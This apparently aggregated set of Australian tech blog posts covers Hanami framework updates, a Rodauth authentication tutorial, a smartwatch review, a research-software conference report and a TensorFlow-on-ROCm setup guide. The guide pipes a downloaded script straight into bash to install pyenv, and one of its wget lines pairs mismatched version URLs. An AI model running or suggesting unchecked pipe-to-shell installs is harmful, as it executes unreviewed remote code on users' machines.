Adrian Chadd Andrew Pam Andrew Ruthven Francois Marier Gareth Lev Lafayette Linux Australia Matt Palmer Michael Still Peter Lieverdink Russell Coker Silvia Pfeiffer Simon Lyall Tim Riley Tim Serong 
A SWAY session by Joanne of Royal Far West School. http://sway.org.au/ via https://coviu.com/ SWAY is an oral language and literacy program based on Aboriginal knowledge, culture and stories. It has been developed by Educators, Aboriginal Education Officers and Speech Pathologists at the Royal Far West School in Manly, NSW.
Category: Array
Uploaded by: Silvia Pfeiffer
Hosted: youtube
Category: 2
Uploaded by: Silvia Pfeiffer
Hosted: youtube
This screencast shows how a user of the PARADISEC catalog logs in and explores the collections, items and files that the archive contains.
Category: 2
Uploaded by: Silvia Pfeiffer
Hosted: youtube
Screencast of how to use the PARADISEC catalog for managing and publishing collections.
Category: 2
Uploaded by: Silvia Pfeiffer
Hosted: youtube
Screencast of how a PARADISEC administrator uses the PARADISEC catalog for managing the consistency of metadata and staying on top of uploaded files.
Category: 2
Uploaded by: Silvia Pfeiffer
Hosted: youtube
Continuations, 2025/40: Popping offThe big achievement this week: I released Hanami 2.3 beta1!
It had been a while since we cut a release (a lot of work had gone into setting up our sponsorship and preparing our upcoming site), so I’m very happy to have this out.
This release included contributions from a whopping nineteen contributors! This is one of the surest signs of our growing success, and I’m very thankful for everyone’s help!
This was also a whopping week for the Hanami Discord, which as Kyle aptly put it, is popping off. A slew of new people have joined (both old friends and new!) and are sharing ideas and questions. It’s exciting to see! And since a lot of the chat happens while I’m still asleep in Australia, I’m really grateful to my fellow community members for all the answers and support they provide. 💗
This week I was merging PRs right up until the day of release. A few notable ones: custom console extensions (a two parter), support for autoloaded consts in config/routes.rb, a fix to avoid false negatives in content type matching, and a fix for our --head app generator.
I also had the pleasure of getting to work a bunch with Andrea Fomera, who has entered the Hanami community with great gusto, with PRs in progress for colourising our CLI (much needed!) and adding resource-oriented routes (also much needed!). Andrea’s hanami-omakase project looks like it will be a wonderful proving ground for framework improvements, and I’m looking forward to seeing her continued work!
With all the new attention on Hanami, I’m nervous that people will see us for all our shortcomings, but thankfully everyone has been very gracious. Andrea’s Hanami after one week captures the spirit very well.
In a stroke of good timing, this week I connected with someone interested in helping us straight out our homepage marketing messages. Looking forward to seeing where this goes.
When Ruby Weekly arrived in my inbox on Friday, I learnt about the Ruby Association call for grant proposals, so this weekend I wrote up a proposal for implementing a framework extensions API for Hanami. This is something I want to do next year one way or another, but if this can be supported by a grant, not only would it help extend our funding, it would also be the impetus for me to get started on it sooner.
After having some good discussions recently about how Hanami Assets could support multiple asset management backends, over the weekend Andrew Nesbitt popped up out of nowhere with a hanami-sprockets gem! Andrew had to apply a few hacks to get this to work. If anyone is interested, making asset management more extensible is a space that needs some work and would immediately help folks interested in using alternative systems.
Excited to see Ryan Bigg lend his writing talents to introducing Hanami concepts to Rails developers. On models, on controllers! On Donner and Blitzen!
What’s next for me? This week I need to share some clarity about our 2.3 release (hopefully by end October), start reviewing some of the code that’s still waiting to merge in (like this pair of chunky router PRs), and if I find some time, take a look at why Algolia/AppSearch is not doing what we want for our new site’s search.
The Astronaut Maker: How One Mysterious Engineer Ran Human Spaceflight for a Generation by Michael Cassutt
A biography of NASA administrator George Abbey covering his career at NASA and influence he had over manned spaceflight. 4/5
The Universal Timekeepers: Reconstructing History Atom by Atom by David J. Helfand
How isotopes are used to date events from the recent to distant past and find out other things like the atmosphere’s composition millions of years ago. Worth reading 3/5
My Scoring System
Bruce Schneier and Nathan E. Sanders wrote an insightful article about AI in Government [5].
Nick Cheesman wrote an insightful article on the failures of Meritocracy with ANU as a case study [7]. I am mystified as to why ABC categorised it under Religion.
David Brin wrote an interesting short SciFi story about dealing with blackmail [8].
Charles Stross has an interesting take on AI economics etc [9].
The 2025 New Zealand Research Software Engineering Conference was held on September 23-24th. It has run for almost a decade, starting in 2016 as the CRI Coding Conference before becoming the Science Coding Conference, a title it kept until 2020, when it became the Research Software Engineering Conference. Throughout this time, it has focused on science and engineering, high performance computing, and cloud computing and is aimed at various coders, sysadmins, software engineers, data analysts, and IT managers from public research institutions and has the endorsement of the RSE Association of Australia and New Zealand.
As the programme indicates, this year's selection of presentations and BoFs has a strong emphasis on machine learning and developments in artificial intelligence. This was evident right from the very start with Nick Jones' keynote address on the first day, and with numerous presentations throughout the conference. A concern must be raised when this pivot to AI/ML involves a recursive comparative testing being conducted with other AI/ML systems. Ultimately, the validity of computational modelling must come not only from the quality of the inputs but the real-world predictive (and hindcasting) value of the outputs.
Thankfully, there was little in the way of "AI/ML marketing hype" at this conference, which really was firmly dedicated to actual computational practice, development of skills and knowledge, and research outputs. Further, there was only a moderate amount of theory, and that's primarily for foundations, as it should be. Being in Aotearoa New Zealand, it is perhaps unsurprising that there were several presentations on Earth sciences, but also of note was the emphasis on climatology, oceanography, and new developments in forensics.
Interestingly, Australian research software development and education were present in a number of presentations, including speakers from WEHI and CSIRO. From Research Computing Services at the University of Melbourne received a surprising highlight with my own presentation, "Programming Principles in a High Performance Computing Environment", the first presentation of the conference and Daniel Tosello's "VSCode on the node" being the third. It bodes well for current and future Trans-Tasman collaboration.
Finally, the Research Software Engineering New Zealand Conference included a small number of explicit community-building presentations. In conferences such as these, presentations are often of a special interes,t but with a much wider and latent feature being the awareness of the directions that other institutions and individuals are taking and the strength of professional connections, a critical requirement not only for an individual's development, but also for raising the collective knowledge of the institutions that they belong to.
Continuations, 2025/39: Momentum buildingWow, what a big week in Ruby land…
…that’s because I got to merge a whopping SIX new PRs into Hanami and Dry, all from community contributors!! Subdomain methods on requests, improved file collision handling in generators, avoiding RuboCop RSpec issues in our default files, Dry Logger payloads with blocks, better logging performance for your log level, conventional Rake task support. Thank you to Aaron Allen, and an extra thank you to brand new contributors stephannv, wout, Petrik de Heus, and Alexander Zagaynov! 🥰
Checked out Sean’s great work examining the impact of memoizing container components. In short: things can get a whole lot faster. This has been low-hanging fruit for a long time, so I’m really glad Sean has picked this up!
This week Adam completed bringing all of our Dry repos into our new repo-sync technology, and is already moving onto the Hanami repos. As a lover of ducks-being-in-a-row, this has me unreasonably excited.
Wrote a first pass at marketing copy for the new site. This is definitely not my forté, but it at least it informs the shape and structure of the homepage, which will help unblock Max on the web design.
I want to continue to refine our marketing messages, so if you’re a marketing-shaped person interested in helping open source projects, please reach out!
Also on the site: chatted with Jojo today, who’s been valiantly wrangling Algolia/DocSearch into something that works for us. It’s a complicated system, so the going is a bit tough, but we’re getting there. I might pitch in a bit on this in the coming week.
Can I take this dot point to acknowledge just how many amazing people are helping Hanami right now? The momentum is building!
Planned to spend this afternoon preparing our changelogs for a 2.3 beta1 release, but instead I ended up doing some user support work instead. It did allow me to write this little tutorial-slash-meditation on where we are as a project, Per-slice sessions in Hanami.
This coming week: 2.3 beta1. I said it here, so now there’s no excuse not to deliver.
Per-slice sessions in HanamiOne of the things I do in Hanami-land is provide support. I love doing this because it helps me understand all the contours of our framework as it meets the real world. Bringing your questions is seriously one of the most helpful things you can do for Hanami right now. (At this moment, Aaron would be telling you to join our Discord!)
A question that came up this week was about how to have separate Rack cookie sessions per slice.Â
You can achieve this by using the session middleware inside each slice in your routes:
# config/routes.rb
module MyApp
class Routes < Hanami::Routes
slice :main, at: "/main" do
use Rack::Session::Cookie,
key: "my_app.session.main",
secret: "YOUR_SECRET_HERE"
expire_after: 60 * 60 * 24 * 365
# Your slice routes here
root to: "home.show"
end
slice :admin, at: "/admin" do
use Rack::Session::Cookie,
key: "my_app.session.admin",
secret: "YOUR_SECRET_HERE"
expire_after: 60 * 60 * 24 * 365
# Your slice routes here
root to: "home.show"
end
end
endWe’ve put a lot of care into allowing slices to be as independent as possible in Hanami apps. This is one such example!
You can see that I have some �home.show� actions in the routes above. I used these in my test app to confirm this works. Here’s how they look.
# slices/admin/actions/home/show.rb
# The "main" slice version of this looks exactly the same,
# just inside the `Main` namespace.
module Admin
module Actions
module Home
class Show < Admin::Action
def handle(request, response)
if request.params[:set]
request.session[:current_user] = request.params[:set]
response.redirect "/admin"
end
response.body = "Current user: #{request.session[:current_user]}"
end
end
end
end
endWith this done, I can visit /admin?set=admin-user and /main?set=main-user, and observe that when visiting /admin and /main I see different values for their current user, because each one has an entirely independent session!
Currently, there’s one caveat to this arrangement. You also need to enable cookie sessions inside your app.
# config/app.rb
module MyApp
class App < Hanami::App
config.actions.sessions = :cookie, {
secret: "YOUR_SECRET_HERE",
expire_after: 60 * 60 * 24 * 365
}
end
endThis session won’t be used, because we explicitly use the middleware inside each slice’s routes, but it’s necessary for Hanami actions to enable their session support in the first place.
I want us to fix this! I’ve filed three items on our roadmap to look at this:
This is a good example of where Hanami is right now. Really powerful foundational structures, but some rough edges that we need to smooth over. If you’re a Rubyist looking to contribute your energies to something good, we’d love to support you pitching in on this. Better session handling could be your opportunity! 🌸
The FOSS Android program for communicating with smart watches is Gadget Bridge which now has support for the Colmi P80 [1].
I first blogged about the Colmi P80 just over a month ago [2]. Now I have a couple of relatives using it happily on Android with the proprietary app. I couldn’t use it myself because I require more control over which apps have their notifications go to the watch than the Colmi app offers. Also I’m trying to move away from non-free software.
Yesterday the f-droid repository informed me that there was a new version of Gadget Bridge and the changelog indicated support for the Colmi P80 so I connected the P80 and disconnected the PineTime.
The first problem I noticed is that the vibrator on the P80 when on it’s maximum setting is much weaker than that on the PineTime, so weak that I often didn’t notice it. Maybe if I wore it for a few weeks I would teach myself to notice it but it should just be able to work with me on this. If it could be set to have multiple bursts of vibrating then that would work.
The next problem is that the P80 by default does not turn the screen on when there’s a notification and there seems to be no way to configure it to do so. I configured it to turn on when I raise my arm which can mostly work but that still relies on me noticing the vibration. Vibration and the screen light turning on would be harder to miss than vibration on it’s own.
I don’t recall seeing any review of smart watches ever that stated whether the screen would turn on when there’s a notification or whether the vibration was easy to notice.
One problem with both the PineTime (running InfiniTime) and the P80 is that when the screen is turned on (through gesture, pushing the button, or a notification in the case of the Pinetime) it is active for swiping to change the settings. I would like to have some other action required before settings can be changed so that if the screen turns on when I’m asleep my watch won’t brush against something and change it’s settings (which has happened).
It’s neat how Gadget Bridge supports talking to multiple smart watches at the same time. One useful feature for that would be to have different notification settings for each watch. I can imagine someone changing between a watch for jogging and a watch for work and wanting different settings.
No authentication for Bluetooth connections.
Runs non-free software so no chance to fix things.
Battery life worse than PineTime (but not really bad).
Vibration weak.
Screen doesn’t turn on when notification is sent.
I’m using the PineTime as my daily driver again. While it works well enough for some people (even with the Colmi proprietary app) it doesn’t do what I want. It is however a good test device for FOSS work on the phone side, it has a decent feature set and is cheap.
Apart from lack of authentication and running non-free software the problems are mostly a matter of taste. Some people might think it’s great the way it works.
Continuations, 2025/38: Tutorial styleA light week for me. My usual Hanami Friday was spent at a work retreat. As no small consolation, I got to visit beautiful Hamilton Island and spend a good amount of time in the ocean.
I did start the week by finishing and posting my Rodauth tutorial: Rodauth, meet Hanami. I hadn’t written a tutorial-style post in a long time, and I really enjoyed putting this one together! I hope it’s a valuable resource to Hanami users looking for authentication in their apps.
I hope to share more material like this in the future. It squarely addresses “Help our users be more successful with Hanami” from our 2025 goals. While I’m happy to bootstrap this, I also think posts like this are perfect opportunities for new contributors. Every blog post helps build our collective knowledge and increases community awareness of our tools!
I’m also thinking about how we can get information like this more visible to people coming to our official docs. Possibly a “recipes” section in our guides?
The RubyGems drama occurred over the final night and then the return journey from my trip. I’m disappointed this was handled in a way that left maintainers hurt and the broader community confused.
I’m not joining any outrage parade at the minute. I expect everyone involved was acting in what they believed to be the best interests of the Ruby community, even if things were executed poorly. But I do believe that more needs to be done to rebuild trust from here. So even though the Ruby Central Q&A will be at 3am for me, I care enough about Ruby that I’ll be getting up for it.
I’ve fallen into this pattern where I do an hour or so of self-directed learning in the mornings before going to work. Until recently it was an excellent CMU course on the design of SQL database systems, which I’ve mentioned previously here. I’ve finished that, so I thought I would do something shorter and fun as a break before finding another course to do. I chose The freeCodeCamp.org hot dog or not hot dog tensorflow course. 90 minutes seemed achievable, and I too wish to know if an object in front of me is a hot dog or not.
The course uses Google Colab to walk you through the process. Colab is interesting, I had never used it before and I must say the user interface wasn’t completely obvious to me. One issue is that the workspace keeps timing out — I do my learning in small bursts tetrised around the other things in my life, and Google wants to reap idle workspaces (which is fair). Combined with the quite slow dataset download process this just wasn’t working for me.
But I own computers, some of which have GPUs. I should just be able to run the same code in my homelab right?
Well… That’s a nice theory. It was much harder than I expected. Because my chosen machine has an integrated AMD GPU, I need to use AMD’s ROCm. That means I needed to enter a twisting maze of conflicting python, tensorflow and tensorflow-rocm versions, a typoed GPU version check (yes really), and spend a few hours fighting the incantations and reading reddit posts. Additionally, because I need real physical GPU hardware for this, I can’t just play in a virtual machine. I instead need to risk messing up a physical machine I am somewhat fond of, so that’s nice.
I’ll save you the time. To get tensorflow working on Debian 12 with an AMD GPU, I needed to do the following dance steps…
The version of ROCm I need only supports python 3.9, 3.10, and 3.12. Of course Debian 12 ships with python 3.11 which is the missing option there, so that’s nice. Let’s use pyenv to get a python 3.12 on Debian 12:
sudo apt install -y build-essential libssl-dev zlib1g-dev libbz2-dev \
libreadline-dev libsqlite3-dev wget curl llvm libncursesw5-dev \
xz-utils tk-dev libxml2-dev libxmlsec1-dev libffi-dev liblzma-dev
curl https://pyenv.run | bash
Now add this to your .bashrc:
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init --path)"
eval "$(pyenv init -)"
eval "$(pyenv virtualenv-init -)"
And restart your shell. Now you can install python 3.12:
pyenv install 3.12.11I like virtualenvs to be in ~/virtualenvs/ so we need to be sneaky making our virtualenv instead of using the pyenv tooling:
${PYENV_ROOT}/versions/3.12.11/bin/python3 -m venv ~/virtualenvs/tensorflow
. ~/virtualenvs/tensorflow/bin/activate
Now we need to install ROCm:
sudo apt update
sudo apt install "linux-headers-$(uname -r)"
sudo apt install -y python3-setuptools python3-wheel libpython3.11
wget <a href="https://repo.radeon.com/amdgpu-install/latest/ubuntu/jammy/amdgpu-install_7.0.1.70001-1_all.deb">https://repo.radeon.com/amdgpu-install/6.4.3/ubuntu/jammy/amdgpu-install_6.4.60403-1_all.deb</a>
sudo apt install ./amdgpu-install_7.0.1.70001-1_all.deb
sudo apt-get update
sudo apt-get install amdgpu-dkms rocmAnd now we can go back and install tensorflow and ROCm in our python 3.12 virtualenv:
pip3 install uv
uv pip install tensorflow==2.19.0
uv pip install -U tensorflow-rocm==2.19.0 \
-f https://repo.radeon.com/rocm/manylinux/rocm-rel-7.0/And now we can run python, import tensorflow, and ask if it has a physical GPU:
$ python3
Python 3.12.11 (main, Sep 21 2025, 08:10:09) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import tensorflow as tf
2025-09-21 08:24:18.780938: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: SSE3 SSE4.1 SSE4.2 AVX AVX2 AVX512F AVX512_VNNI AVX512_BF16 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
>>> print(tf.test.is_gpu_available())
WARNING:tensorflow:From :1: is_gpu_available (from tensorflow.python.framework.test_util) is deprecated and will be removed in a future version.
Instructions for updating:
Use `tf.config.list_physical_devices('GPU')` instead.
2025-09-21 08:24:25.156483: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
2025-09-21 08:24:26.361397: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
2025-09-21 08:24:26.361442: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
2025-09-21 08:24:26.362540: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
2025-09-21 08:24:26.362576: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
2025-09-21 08:24:26.362608: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
2025-09-21 08:24:26.362630: I tensorflow/core/common_runtime/gpu/gpu_device.cc:2021] Created device /device:GPU:0 with 1982 MB memory: -> device: 0, name: AMD Radeon Graphics, pci bus id: 0000:c6:00.0
True
>>> print(tf.config.list_physical_devices('GPU'))
2025-09-21 08:24:51.553486: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
2025-09-21 08:24:51.553590: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
2025-09-21 08:24:51.553613: I external/local_xla/xla/stream_executor/rocm/rocm_executor.cc:920] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero
[PhysicalDevice(name='/physical_device:GPU:0', device_type='GPU')]
>>> Truly we live in the future.
I have updated this to post use ROCm 7.0.1, it originally used ROCm 6.4.
Rodauth, meet HanamiPractically every web app needs authentication, and you really want to get it right. This is why I’ve long admired Rodauth. It’s a powerful, proven authentication framework, and best of all, it’s lightweight, configurable, and supports Ruby apps of all kinds! Now we’re talking!
My admiration, though, has always been from afar. That was until this week, when I finally found the chance to use it first-hand. I added Rodauth to Decaf Sucks, my open source Hanami app.
Did it live up to my expectations? I won’t hold back: it did! Rodauth is great!  I recommend it to anyone wanting authentication in their Hanami apps.
If you’re keen to jump straight into a working setup, you can pull down decafsucks/decafsucks. Once you have it up and running, visit localhost:2300 to see the app, then follow the sign up flow to create an account and test the authentication. You’ll also want to open localhost:8025 to inspect Rodauth’s emails.
Here’s all the relevant code:
Database migration: 20221120201330_create_rodauth_tables.rb
Rodauth app:Â slices/main/authentication_app.rb
Middleware use:Â config/routes.rb
Authenticated action:Â slices/main/actions/authenticated.rb
Hanami integration feature: lib/rodauth/hanami.rb
Rodauth templates: slices/main/templates/authentication_app/
View context helpers: slices/main/views/context.rb
Now let’s get into the details!
Rodauth is built on top of Roda, so if you’re adding it to a Roda app, setup is as simple as this:
class MyApp < Roda
plugin :sessions, secret: "__secret_here__"
plugin :rodauth do
# Configure Rodauth here
end
route do |r|
# Enable the Rodauth routes
r.rodauth
# Protect the routes defined below here
rodauth.require_authentication
end
endHere’s what’s great, though. If your app is built using something else, adding Rodauth is just as easy! For my integration into Hanami, it boiled down to this:
module Main
class AuthenticationApp < Roda
# Make the Roda app available as a middleware
plugin :middleware
plugin :rodauth do
# Configure Rodauth here
end
route do |r|
# Put the Rodauth instance in the Rack env, so we
# can access it from Hanami
env["rodauth"] = rodauth
# Enable the Rodauth routes
r.rodauth
end
end
endThanks to Roda’s middleware plugin, we can now use this Roda app inside our Hanami routes to expose the Rodauth routes:
module Decafsucks
class Routes < Hanami::Routes
slice :main, at: "/" do
# Enable the Rodauth routes
use Main::AuthenticationApp
# Put the rest of our routes here
end
end
endThis arrangement allows Rodauth to check each request as it arrives. If the request is for an authentication-related route, it Rodauth will handle it. Otherwise, it gives control back to the Hanami router and lets the rest of the app do its thing.
The last step is in our app’s actions layer. Here we create an Authenticated action class that requires a signed in user:
module Main
module Actions
class Authenticated < Main::Action
before :require_authentication
private
def require_authentication(request, response)
rodauth = request.env["rodauth"]
handle_rodauth_redirect(rodauth, response) { rodauth.require_account }
response[:current_account_id] = rodauth.account_id
end
# ...
end
end
endThis action defines a require_authentication callback, which uses the Rodauth instance from the Rack env and calls .require_accouint to require a signed in user.
From here, I can make any one of my Hanami actions authenticated by inheriting from Authenticated:
module Main
module Actions
module Reviews
class New < Authenticated
def handle(request, response)
end
end
end
end
endThat’s it! The integration with Hanami feels really natural and straightforward. A lot of this comes down to Rack. It is a true blessing to Ruby, as are toolkits like Roda that embrace it.
👀 I’m sure, keen reader, that you’ve noticed the littleÂ
handle_rodauth_redirect wrinkle in theAuthenticated action above. Don’t worry, we’ll get to that soon!
So far I’ve shown how Rodauth fits into a Hanami app, but not what it does. Let’s get onto this now!
One of Rodauth’s strengths is its flexibility. It’s a mix-and-match authentication framework. It ships with over 50 different features (what it calls its main extensibility mechanism) that let you model all kinds of authentication capabilities and user flows.
For Decaf Sucks, I wanted a simple email + password sign in flow, nothing fancy. This equated to the following Rodauth features:
module Main
class AuthenticationApp < Roda
plugin :rodauth do
enable(
:change_login,
:change_password,
:change_password_notify,
:create_account,
:login,
:logout,
:remember,
:reset_password,
:verify_account,
:verify_login_change
)Breaking these down:
create_account:Â provides an account registration screen.
verify_account:Â delivers an email to the newly signed up user, requiring them to click a link to verify the account.
login and logout: do what they say on the tin.
remember:Â remembers the signed in account across browser sessions.
reset_password:Â provides a standard password reset flow: enter your email address, receive an email, click the link, set a new password.
change_login:Â provides a screen to change your account login, aka your email address.
verify_login_change: works with the above to require confirmation via a link delivered to the new email address.
change_password:Â provides a screen to change your password, requiring the old password be confirmed at the same time.
change_password_notify:Â works with the above, sending an email to notify the user when their password has been changed.
All of these features work together right out of the box. But Rodauth is highly configurable, which allowed me to mould things to my tastes. To see, let’s take a tour of the rest of my plugin :rodauth block!
First, I make the URLs like I want them. I prefer the “sign inâ€� and “sign outâ€� terms, and I wanted the screens for changing the account details nested under account/:Â
login_route "sign-in"
logout_route "sign-out"
create_account_route "sign-up"
verify_account_resend_route "resend-verify-account"
change_login_route "account/change-email"
change_password_route "account/change-password"
verify_login_change_route "verify-email-change"
reset_password_request_route "forgot-password"
reset_password_route "reset-password"Then, get the standard redirects working how I want them:
login_return_to_requested_location? true
logout_redirect "/"
already_logged_in { redirect "/" }Accept a “Name� field when signing in and saving that as a record in my users table, which I then associate with the Rodauth-managed account:
before_create_account do
throw_error_status(422, "name", "must be present") if param("name").empty?
end
after_create_account do
db[:users].insert(
account_id: account[:id],
name: param("name")
)
endRemember the signed in user across browser sessions by default:
after_login do
remember_login
endA few little behavioural things:
# Don't require new passwords to be entered twice
require_password_confirmation? false
# Allow the password to be provided before verifying the account
verify_account_set_password? falseAnd lastly, a whole bunch of tweaks to the text copy:
# Customize UI copy. Prefer "sign in/out" phrasing, and sentence case over title case.
#
# Base
unverified_account_message "unverified account, please verify before signing in"
# Require login
require_login_error_flash "Please sign in to continue"
# Login
login_button "Sign in"
login_error_flash "There was an error signing in"
login_form_footer_links_heading %(<h2 class="rodauth-login-form-footer-links-heading">Other options</h2>)
login_label "Email"
login_notice_flash "You have been signed in"
no_matching_login_message "no matching account"
# Logout
logout_notice_flash "You have been signed out"
logout_button "Sign out"
# Create account
create_account_link_text "Sign up"
# Verify account
verify_account_resend_link_text "Resend my account verification"
# Reset password
reset_password_button "Reset password"
reset_password_request_button "Send me a reset link"
reset_password_request_link_text "Forgot password?"Are you getting the theme? If it’s part of Rodauth, you can bet it’s configurable.
All of this allowed me to create exactly the login experience I wanted, while keeping all the customisations contained to a single location.
Many of Rodauth’s features need to persist data, and it offers a nicely decomposed set of database tables for this purpose, with generally one table per feature. This allowed me to create a migration that contained only the tables required for my chosen features.
By default, Rodauth does a few extra databasey things to provide the best security over your password hashes:
Storing the password hashes on their own in a separate table
Using a separate database account for accessing that table
Allowing the ordinary database account to access the hashes exclusively through database functions
It doesn’t require this approach though, and still functions correctly without it. Since Decaf Sucks is a low-stakes app, and since I wanted to keep things as simple as possible, I scaled this back:
Keep the password hashes in a regular column in the accounts table, accessible by the regular app database user.
Don’t require database functions to access the hashes.
This is simple to achieve via (you guessed it) configuration:
account_password_hash_column :password_hash
use_database_authentication_functions? falseLastly, as I mentioned above, I wanted to capture a user’s name as part of signing up. Per Rodauth’s guide on this subject, you can do this by adding an extra column to its own accounts table, or by maintaining your own table to store this information, and linking it to accounts. I decided on the latter, so I kept my users table, and added account_id and name columns.
Now we’ve given Rodauth everything it needs to operate, all that remains is to make it fit super nicely within our Hanami app. We do this in two ways.
First, actions. Here we can revisit that #handle_rodauth_redirect method from our Authenticated action.
What this does is catch a redirect initiated from Rodauth (when an unauthenticated visitor away from an authenticated page) and translates it into a redirect initiated from the Hanami action. Since its the Hanami action handling this request, doing this is what allows the browser to actually perform the redirect.
We also catch any flash messages created within Rodauth and put them in the action’s own flash object, so they can properly become available in the next request. See all the details here.
Next, views. Rodauth ships with its own templates for all its screens, and will render those by default. Having those built-in is useful for confirming Rodauth’s functionality, but those views are entirely separate from our Hanami app, which means the pages don't sit within our layout, and can't take advantage of anything else available within the standard Hanami view context.
To render Rodauth’s views natively within our app, we have a dedicated Rodauth feature take care of it for us:
enable :hanami
hanami_view_class -> { Main::View }Â This feature (code here) checks for the presence of a matching Rodauth template inside our app (in this case, at slices/main/templates/authentication_app/) and will render that template via a Hanami view, putting it inside the appropriate layout, and giving it access to all our standard view facilities.
With this, the Rodauth-powered pages now fit in with the rest of my app. �
By implementing this as a Rodauth feature, we also have the beginnings of what can one day become a full rodauth-hanami gem, much like Janko Marohnić’s rodauth-rails (whose own code was very helpful for me to figure some of this out!).
After all of that, what do I think of Rodauth? I think Rodauth is great! Once I got the hang of it, building out all my authentication features was both fun and fast. I’m also very happy with the outcome:
The core authentication logic stays tucked away in the Rodauth gem itself, where it can be properly vetted and maintained as standards evolve.
The independent database tables tables provide a nice divide between what Rodauth needs (which will remain relatively stable) and what is otherwise specific to my app (which I can easily evolve, knowing I won’t interfere with auth).
The app-level Rodauth setup is very clearly defined: the AuthenticationApp is the one place we need to go.
I get to use it natively from within my Hanami actions.
I can make its pages feel like native parts of my app.
If there’s ever something more I need for authentication in the future, I know Rodauth will be able to handle it, whether it’s tweaking the configuration, activating more features, or tapping into its logic programatically from within my app.
There were only a couple of areas where I think things could be better:
Rodauth has comprehensive documentation, but because it’s so configurable, the docs seem to focus primarily on configuration. It feels harder than it should be to understand out how each feature works by default, such as what URLs it exposes.
I spelunk code to do a lot of my learning. Rodauth’s code is heavily metaprogrammed. This no doubt plays a big part in its extensibility and in allowing Jeremy to maintain it on his own, but it does make the code harder to understand. There is a guide to Rodauth’s internals, which helps with this, but it still takes a while to get your head around things.
All in all, I feel Rodauth is a true blessing to Ruby. First class authentication features, available for any Ruby app. Now that I’ve got the chance to try it myself, I’ll be even quicker to recommend it. Thank you to Jeremy Evans for building and sharing this amazing system!
I hope that this post and Decaf Sucks are helpful examples of how Rodauth can work nicely inside a Hanami app.
If this has taken your fancy, and you’re interested in contributing to the Hanami community, then I’d love to support you in building a rodauth-hanami gem! Come find us and we can chat about it.
Continuations, 2025/37: App landI did something different this week: I shifted back into app land, and created Tim’s First Rodauth Setup! Now we have it powering authentication in Decaf Sucks. Another step forward for my slowly-but-surely hobby/demo app.
Now I’ve had some hands-on experience with it, let me say this: Rodauth is great! Getting it working in Hanami was pretty straightforward, and once I got the hang of its features, it was a lot of fun to add them one-by-one until I had the authentication experience of my dreams.
I’m part way through a full blog post about this, which I plan to publish this week. Hopefully it will be a valuable resource for Hanami users wanting a streamlined and powerful authentication setup.
Back in framework land, as of this week (and this PR), all Hanami repos support both Rack v2 and v3! Sean gave us CI matrixes in hanami, controller and cli, too.
This was the last big thing we needed for a Hanami 2.3 release, so I put together a 2.3 project board for the few other bits we’ll add around it. I reckon we should be able to get a beta1 release out in the next couple of weeks.
Whenever that beta comes around, it will also include a db rollback CLI command thanks to this great work by Krzysztof that merged this week.
Website work continues. Max added a Tailwind palette for our brand colours, plus some much needed frontend linting, and pulled in a PR of mine from a while ago that adds slot support to Hanami view partials! Jojo started diving into making our Algolia-based search actually useful.
I'm away for a work offsite this week, so my #HanamiFriday won’t happen like usual. Aiming to publish my Rodauth post, at least, plus support the team on various small things across the week where I can.
I’ve just been in Sydney for a couple of days for CloudCon 2025. I think depending on how you count this is my third one of these events — the event has changed names at least twice, so its actually a little hard to work out the lineage of the event. This year’s conference was noticeably smaller than last years which is confusing to me for an event which is so competitively priced and branded so heavily with the hot topics dejour. That said the event was well run, in a good venue, and well worth the time. That is, this event really deserves more support than its getting.
There were some clear themes from the event for me:
So in summary, well done to the event organizers. I hope more punters get on board in the future.
I make no claim to be an expert at this, but I did just need to convert a project from a slightly complicated setup.py / PBR configuration to pyproject.toml and thought I should write up where I landed. I say “slightly complicated” because there are a few very OpenStacky things I like to do in these things. Specifically:
So here’s an example of all of those things that is working ok for me:
[build-system]
requires = [
"setuptools>=61.0",
"setuptools_scm[simple]>=6.2",
"wheel",
"build",
"twine"
]
build-backend = "setuptools.build_meta"
[project]
name = "clingwrap"
dynamic = ["version"]
description = "Build bundles of debugging information for system crashes"
readme = "README.md"
requires-python = ">=3.7"
dependencies = [
"oslo.concurrency", # apache2
"click>=7.1.1", # bsd
"pyyaml", # mit
"shakenfist-utilities", # apache2
]
[project.urls]
"Homepage" = "https://shakenfist.com"
"Bug Tracker" = "https://github.com/shakenfist/clingwrap/issues"
[project.scripts]
clingwrap = "clingwrap.main:cli"
[tool.setuptools.package-data]
clingwrap = [
"examples/*.cwd"
]
[tool.setuptools_scm]
git_describe_command = "git describe --dirty --tags --match v* --first-parent"
write_to = "clingwrap/_version.py"
[project.optional-dependencies]
test = [
"coverage", # apache2
"testtools", # mit
"mock", # bsd
"stestr", # apache2
"tox", # mit
"flake8", # mit
]Note that setuptools_scm[simple] is needed for version tags to work, as is the dynamic = ["version"]. The data files are included by [tool.setuptools.package-data] with the only wart there being that I needed to move the examples directory into the clingwrap directory for them to be included correctly.
